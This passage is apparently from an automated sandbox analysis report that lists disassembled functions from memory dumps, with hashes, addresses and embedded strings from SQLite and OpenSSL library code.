                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
                                                                                                                                                                      • Instruction ID: 49bc30436e6d90acfc40958dada55e55b833763fc3d38fdcf32c3389d05e86c0
                                                                                                                                                                      • Opcode Fuzzy Hash: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
                                                                                                                                                                      • Instruction Fuzzy Hash: 4731F236A0C2538EE7669F25A45027D77A1EB44B48F588435DF08877AECF3DE886C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE00311E01 Relevance: 1.3, APIs: 1, Instructions: 87COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
                                                                                                                                                                      • Instruction ID: d13a0cfa35c4b1c9461e49bdb394a77ebeb847a2cdfd8ee2cef83aab52a5e717
                                                                                                                                                                      • Opcode Fuzzy Hash: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B316C36A08253CAF766AF25A45027D63A5EB44B84F18C431DF09477AEDF3DE896C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE0031F3F0 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
                                                                                                                                                                      • Instruction ID: 290d2b8983907e26b32ae4281cd61b45e2e912f78f4ae8f25122f8c370640c96
                                                                                                                                                                      • Opcode Fuzzy Hash: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
                                                                                                                                                                      • Instruction Fuzzy Hash: A1215132608740C7D354DB26E9806AEB3A5FB88B94F544135EB9847F69CF3CE555CB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FFDFF1BC720 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 403COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
                                                                                                                                                                      • API String ID: 817585512-741541785
                                                                                                                                                                      • Opcode ID: b9356b5a1fbadadde7b26d0aebaef2e44b18eb42acd06dc5fd9ac9bfe1c0a29b
                                                                                                                                                                      • Instruction ID: 73a5bd40f5c8d6500d049e8bc51a0fe30d6a381047b1efe947423205586cec53
                                                                                                                                                                      • Opcode Fuzzy Hash: b9356b5a1fbadadde7b26d0aebaef2e44b18eb42acd06dc5fd9ac9bfe1c0a29b
                                                                                                                                                                      • Instruction Fuzzy Hash: 76027A33F086528AE724CB25E464A6D77A1FB94784F15423ADB7E87BD8DF38E4418B40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF19E980 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 399COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                                                                      • API String ID: 817585512-463513059
                                                                                                                                                                      • Opcode ID: 9b736c4141148f97de10efb1246dfa11abb0bdcc0c82e989849714250e367696
                                                                                                                                                                      • Instruction ID: c214b5f388be68993dc9e39570c3ce2537970454109df442f82e4000808d0e9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 9b736c4141148f97de10efb1246dfa11abb0bdcc0c82e989849714250e367696
                                                                                                                                                                      • Instruction Fuzzy Hash: 04E12152F183C647EF1C8F39A4759792B90AB55784F58423ADABE837D5DE2CB212C380
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFAC73058 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2037809311.00007FFDFAC71000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAC70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2037779023.00007FFDFAC70000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFACD2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD1E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD21000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD26000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD80000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD83000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD85000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD88000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038143865.00007FFDFAD89000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038180876.00007FFDFAD8B000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfac70000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3282304195-0
                                                                                                                                                                      • Opcode ID: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                                                                                                                                      • Instruction ID: c99e4008c83ffe10d32176cd6607247ef1de8db0b93334dab4124a9fd38e7317
                                                                                                                                                                      • Opcode Fuzzy Hash: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E314976709A858AEB648F60F8A0BFD2364FB84744F44407ADA5E47BC8EF38D648C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE00327630 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 357COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007B6570
                                                                                                                                                                      • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                      • API String ID: 4069847057-331183818
                                                                                                                                                                      • Opcode ID: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
                                                                                                                                                                      • Instruction ID: 6a2fa3dd8e56d083a01bac934a9cdc996407267300092ad3358c886ac979e3f0
                                                                                                                                                                      • Opcode Fuzzy Hash: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
                                                                                                                                                                      • Instruction Fuzzy Hash: E1E19172A1C6828AE7668E29A44077A77D1FB65784F105035EB9E43BADDF3CE941CB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE00312135 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
                                                                                                                                                                      • Instruction ID: f70688410dd9e38e62a382a1c6b75897b8946bc5f30fe3f592a9221cb6924844
                                                                                                                                                                      • Opcode Fuzzy Hash: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F311876A09B919AEBA19F60E8407ED6360FB84744F44443ADB4E87BA9DF3CD64CC710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE00311CC1 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                      • API String ID: 0-1194634662
                                                                                                                                                                      • Opcode ID: 88c8b04c2ab8bcf9e7f70dfe1e121138aee3cd889fd0a6941f62ea240cb270fb
                                                                                                                                                                      • Instruction ID: b5f6216f7640dbb8cd2158a6b8b470a68a41d313b49de6c29384ab89e03916c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 88c8b04c2ab8bcf9e7f70dfe1e121138aee3cd889fd0a6941f62ea240cb270fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 3CD19B32B1878285EB52DB29D8416FD67A0EB89B84F484072EF4C4B7AADF7CE545C310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE00311EE7 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 461COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                      • API String ID: 3568877910-3130753023
                                                                                                                                                                      • Opcode ID: 2a42b0082f3978e4a625e517d7351a3eb170e7835e453a3fe52c3c890b2c269d
                                                                                                                                                                      • Instruction ID: a39d94d67ad6cfa4d8b50724598d9d9145fde04723d73097e4b80e92da9db9b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a42b0082f3978e4a625e517d7351a3eb170e7835e453a3fe52c3c890b2c269d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9012D062A28A8381FB52DB65D4042BEA790FF85784F40A032EF8D477AEDF7CE5458710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE003124EB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 332COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
                                                                                                                                                                      • API String ID: 3568877910-446233508
                                                                                                                                                                      • Opcode ID: 54244ec30937f2beb53085ca8ed0f4be0d541556569252cb7cdcc3af8c55fd2d
                                                                                                                                                                      • Instruction ID: 45117cab23ac80a217e8914682ef10f9ceaa197601273edf83eb574d953b3826
                                                                                                                                                                      • Opcode Fuzzy Hash: 54244ec30937f2beb53085ca8ed0f4be0d541556569252cb7cdcc3af8c55fd2d
                                                                                                                                                                      • Instruction Fuzzy Hash: 36E18C65A1C68382EA62EB11D5406FE6794EF89B84F445036EF4D47BAADF7CE601C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF20A080 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 384COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
                                                                                                                                                                      • API String ID: 0-3733955532
                                                                                                                                                                      • Opcode ID: be37f06aacf369e03fd463b55b862d9329bdf16dc466088b9bbacab0d9f850e3
                                                                                                                                                                      • Instruction ID: 37f38c1f942aec2154e86cb05c5707d7b8651dc7fd8d112c5d309688ab6b9789
                                                                                                                                                                      • Opcode Fuzzy Hash: be37f06aacf369e03fd463b55b862d9329bdf16dc466088b9bbacab0d9f850e3
                                                                                                                                                                      • Instruction Fuzzy Hash: DA029E23B09A8286EF158B11E464B7973A0FF45B94F984275DE7EC62E8DF3CE5448740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE00311A23 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
